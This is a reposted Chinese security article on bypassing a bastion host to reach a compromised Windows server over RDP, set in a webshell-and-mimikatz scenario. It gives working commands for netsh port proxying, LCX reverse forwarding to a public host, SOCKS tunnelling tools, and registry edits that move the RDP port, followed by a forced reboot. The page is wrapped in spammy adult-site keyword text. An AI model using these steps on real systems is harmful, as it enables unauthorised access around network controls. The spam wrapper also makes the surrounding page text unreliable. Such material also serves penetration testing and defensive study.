成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

如何繞過堡壘機遠程登錄

安全 應用安全
假設一個場景:在Webshell中執行mimikatz獲取到win管理員密碼,并且本地查看端口3389是開放的,可是從當前跳板機無法遠程到目標機器。因為某個特定需求,一定要遠程登錄到這臺win服務器,這時該怎么辦?

[[337603]]

本文轉載自微信公眾號「Bypass」,作者Bypass 。轉載本文請聯系Bypass公眾號。

假設一個場景:在Webshell中執行mimikatz獲取到win管理員密碼,并且本地查看端口3389是開放的,可是從當前跳板機無法遠程到目標機器。因為某個特定需求,一定要遠程登錄到這臺win服務器,這時該怎么辦?

首先我們先分析一下這個場景,端口開放卻無法連接,最有可能的情況,就是到達目標網段受到ACL策略限制,只允許通過特定網段登錄,比如說堡壘機。大多數堡壘機部署時,為了不改變現有的網絡拓撲結構,采用旁路部署的方案,通過ACL策略限制用戶訪問特定端口。

那么,我們就可以用另一種方式來描述這個問題:目標服務器遠程端口受到ACL限制,但其他端口沒有限制,那么,最簡單的解決方式就可以通過端口轉發來繞過。

1、使用netsh命令進行端口轉發

Windows自帶的netshnetsh實現端口轉發,監聽12345端口,轉發到本地3389端口,可繞過訪問策略限制。

  1. #A、3389端口轉發到12345端口 
  2. netsh interface portproxy add v4tov4 listenaddress=192.168.126.32 listenport=12345 connectaddress=192.168.126.32 connectport=3389 
  3.  
  4. #B、查看配置好的端口映射清單 
  5. C:\Windows\system32>netsh interface portproxy show v4tov4 
  6.  
  7. 偵聽 ipv4:                 連接到 ipv4: 
  8.  
  9. 地址            端口        地址            端口 
  10. --------------- ----------  --------------- ---------- 
  11. 192.168.126.32  12345       192.168.126.32  3389 

這樣一來,通過攻擊機跳板機直接遠程目標機器的12345端口,就可以實現遠程登錄。

2、LCX 端口轉發

在目標機器上執行:lcx.exe -slave 公網ip 51 內網ip 3389

在公網的機器執行:Lcx.exe –listen 51 3340

本地機器上連接 127.0.0.1:3340,即可連接上目標機器的3389。

3、內網穿透工具

SOCKS代理,如Ngrok、frp、EW、reGeorg、sSocks等

通過利用SOCKS協議,結合Proxifier使用,可實現mstsc登錄目標主機。

4、修改Windows遠程桌面端口

通過修改Windows默認遠程桌面端口,從而繞過ACL策略訪問限制。

修改注冊表,命令如下:

  1. REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v "PortNumber" /t REG_DWORD /d 12345/f 
  2. REG ADD "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 12345 /f 

強制重啟目標服務器后,注冊表生效。

  1. shutdown -r -t 0 

此時,就可以遠程目標服務器的12345登錄。

 

責任編輯:武曉燕 來源: Bypass
相關推薦

2016-11-17 14:22:59

2013-10-10 11:04:32

VMInjector虛擬機安全工具

2022-02-22 08:53:35

GrayLogLinux釘釘

2013-05-28 13:51:57

LinuxCentos

2018-02-05 10:09:28

搭建堡壘機原則

2010-08-09 10:40:39

2009-02-26 10:34:00

路由器遠程登錄

2009-08-17 08:22:53

linuxssh遠程登錄

2017-11-08 10:47:04

2014-08-15 15:57:18

2009-08-13 16:28:07

windows2008密碼驗證

2025-01-20 15:37:41

2017-10-17 14:20:29

2015-10-21 11:03:21

ssh登錄Linux

2009-03-04 06:37:00

2020-04-09 16:28:34

存儲

2017-10-19 17:47:57

2011-10-11 10:02:48

2016-06-17 09:49:42

2011-03-14 18:09:04

Telnet
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 久久国产一区二区 | 特级毛片www | 9久9久9久女女女九九九一九 | 亚洲九九| 一区二区久久 | 国产va| 色婷婷综合久久久中字幕精品久久 | 亚洲a级| 欧美αv| 国产黑丝在线 | 亚洲精品91| 中文字幕乱码一区二区三区 | www.日日夜夜| 日韩一区二区三区精品 | 亚洲日日操| 99久久久无码国产精品 | 91日韩| 日韩欧美国产一区二区三区 | 91精品久久久久久久久久入口 | 一区二区三区免费 | 影音先锋中文字幕在线观看 | 国产在线精品一区二区三区 | 五月婷婷丁香婷婷 | 欧美成人一区二区 | 欧美一级黄带 | 国产第一页在线观看 | 免费的色网站 | 日一区二区 | 国产成人精品免高潮在线观看 | 欧美性一区二区三区 | 黄色av网站在线观看 | 亚洲精品68久久久一区 | 日韩免费一区二区 | 久久99视频 | 欧美 日韩 亚洲91麻豆精品 | 国产成人一区二区三区久久久 | 精品国产黄a∨片高清在线 成人区精品一区二区婷婷 日本一区二区视频 | 精品亚洲一区二区三区四区五区 | 成人不卡 | 精品久久久一区 | 欧美国产日韩一区二区三区 |